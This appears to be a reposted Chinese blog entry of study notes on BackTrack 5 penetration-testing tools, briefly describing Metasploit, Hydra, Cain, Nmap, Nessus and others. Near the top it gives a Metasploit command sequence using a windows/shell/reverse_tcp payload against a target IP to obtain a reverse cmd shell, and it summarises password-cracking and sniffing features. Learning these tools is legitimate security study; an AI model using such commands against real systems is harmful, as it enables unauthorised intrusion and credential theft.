网络漏洞攻击工具
Metasploit
先msfupdate升级:
然后选择msfconsole:
接下来:
set LHOST 本机IP地址 setLPORT 4445 setg PAYLOAD windows/shell/reverse_tcp setg RHOST 目标IP地址 setg port 21 set target 随意数字 exploit
这样就可以反弹一个cmd shell了。
密码破解
Hydra
多samba,smb,ssh,smtp,telnet,mysql,ftp,vnc,icq,socks5,pcnfs,cisco等各类主流服务进行在线密码破解攻击尝试攻击。
字典破解,Protocol中有很多,主要是之前扫描出来的端口开放情况来进行的。
Windows下渗透工具介绍
maltegoCE
DNS收集。
IBM Rational AppScan
自动化web应用的安全漏洞评估工作,能扫描和检测所以常见的web应用安全漏洞,例如SQL注入、跨站点脚本攻击、缓冲区溢出以及最新的FLASH/FLEX应用和Web2.0应用暴露等方面安全漏洞扫描。
SmartWhois
查找所以关于IP地址、主机名或者域名的可用信息,包括国家、州或省、沉城市、网络供应方、网络管理员和技术支持信息。
Sam Spade
如果一个黑客想查询一个有域名的公司的某些信息,通常可以对该域名执行whois命令来找到附加信息。UNIX的大多数版本都装有whois,所以黑客只需要在终端窗口或者命令提示前输入“whois 要攻击的域名”就可以了。而对于windows的操作系统,要执行whois命令就需要一个第三方的工具:sam spade。
Cain
可以破解屏保、PWL密码、共享密码、缓存口令、远程共享口令、SMB口令、支持VNC口令解码、Cisco Type-7口令解码、Base64口令解码、SQL Server 7.0/2000口令解码、Remote Desktop口令解码、Access Database口令解码、Cisco PIX Firewall口令解码、Cisco MD5解码、NTLM Session Security口令解码、IKE Aggressive Mode Pre-Shared Keys口令解码等综合工具,还可以远程破解,可以挂字典以及暴力破解,其sniffer功能极其强大,几乎可以明文捕获一切帐号口令,包括FTP、HTTP、IMAP、POP3、SMB、TELNET、VNC、TDS、SMTP、MSKERB5-PREAUTH、MSN、RADIUS-KEYS、RADIUS-USERS、ICQ、IKE Aggressive Mode Pre-Shared Keys authentications等
FOCA Free
可以找出更多有关分析网站提供的任何文件的元数据。
Nessus
前面讲到过。= =
Nmap – Zenmap GUI
一个网络扫描程序,你还可以用它来看别人电脑在下载什么。
Metasploit
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,密码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
Firefox Portable
火狐的插件。
获取的知识
再次感谢《back track 5 从入门到精通 ——渗透之道》这本书。
这本书算是边学习边操作边记录边分享的完成了,但是BT5里面还有很多工具,以后我会主要分享里面很实用很实用的工具。
希望学习完这本书能够BT5基本入个门,在打开每个工具的时候,都会有帮助,太棒了~~~其实可以直接看帮助的,但是全是英文,虽然我个人觉得我的英文还不错。
本文转自我爱物联网博客园博客,原文链接:http://www.cnblogs.com/yydcdut/p/3491302.html,如需转载请自行联系原作者
